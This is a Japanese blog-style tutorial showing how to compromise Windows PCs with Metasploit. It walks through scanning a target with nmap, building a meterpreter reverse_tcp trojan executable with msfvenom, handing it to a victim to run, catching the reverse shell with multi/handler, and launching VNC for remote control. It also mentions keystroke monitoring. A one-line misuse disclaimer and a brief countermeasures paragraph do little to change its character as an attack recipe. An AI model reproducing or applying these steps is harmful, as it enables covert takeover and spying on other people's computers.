【kalilinux講座1回目】metasploitを利用したwindows 10 ハッキング

※絶対に悪用禁止です
windows 10に上がってもwindows10は相変わらずトロイの木馬バックドアと呼ばれる攻撃に弱いです。この方法でwindows10だけでなくwindows 8, 7,vita,xp,などでも動作させることができます。トロイの木馬バックドアでは相手のPCをリモートで動かすことができる。ここではreverse_tcpを試します。これは、TCP上から相手のPCをハッカーのPCにリモートするマルウェアです。これをすることでキーボードの操作の監視、GPSの起動といったコンピュータの操作や、悪いことの踏み台としてあなたのPCを悪い人が使うことができます。Metasploitは素晴らしいツールです。Metasploitはハンドラ(通常待機しているが呼び出されると、プログラムを中断し別の要求された処理を行うプログラム)とペイロード両方を生成する性質を持っています。一度プログラムが相手のpcで実行されると相手のPC上でmeterpreterシェルを起動します。では実際にやっていきます。

準備・必要なもの

kalilinux
windowsのPC

やり方

ハッカーIPアドレスを見つけます。
#ip route

ポートの確認
nmap -n -sV 相手のIPアドレス
任意のポートがopenとなればOKです。

exeファイルの作成
#msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=ハッカーのアドレス LPORT=ポート番号 -o ファイル名

できたexeファイルをwindowsの人にプレゼントします.

1ハンドラを起動します。kalilinuxで
#msfconsole
MSF>use multi/handler

2ペイロードを設定します。
msf exploit(handler) >set PAYLOAD windows/meterpreter/reverse_tcp

3ポートの設定
msf exploit(handler) >set LPORT ポート番号

4ホストの設定
msf exploit(handler) > set LHOST ハッカーのIP

5exploit 起動
msf exploit(handler) > exploit

6 通信の確認
相手にexeファイルを実行してもらいこのような画面になれば相手の操作を持つことができます

msf exploit(handler) > exploit
[*] Started reverse handler on ハッカーのIP
[*]Started payloadhandler...
[*]Sending stage(xx byte) to 相手のIP
[*]Meterpreter session 1 opened(ハッカーのIP -> 相手のIP)at 今日の日付
meterpreter >

今回はvnc(遠隔地からPCを動かすソフト)を起動してみたいと思います
meterpreter > run vnc

対策・予防策

絶対に実行しなければ、ツールが動かないでしょ、なんてことはないです。パソコンに入れるだけでアウトです。対策としては、ファイアーウォールで必要なポート以外は閉じる。もし実行してしまった場合は、タスクマネージャから消す、ファイル本体を消すといったことが必要です。
こんな変なexeファイルをもらっても相手は怪しがって受け取らないですね。
参考
https://www.sourcenext.com/product/security/vsinfo/001372.html?i=rd

お便りはこちらに
mail
nakadasanda@outlook.com

ご支援お願いします
BitCoin:
[12SfpSKAJ9zXcwGNKzeumsc2oLSycaYgTe]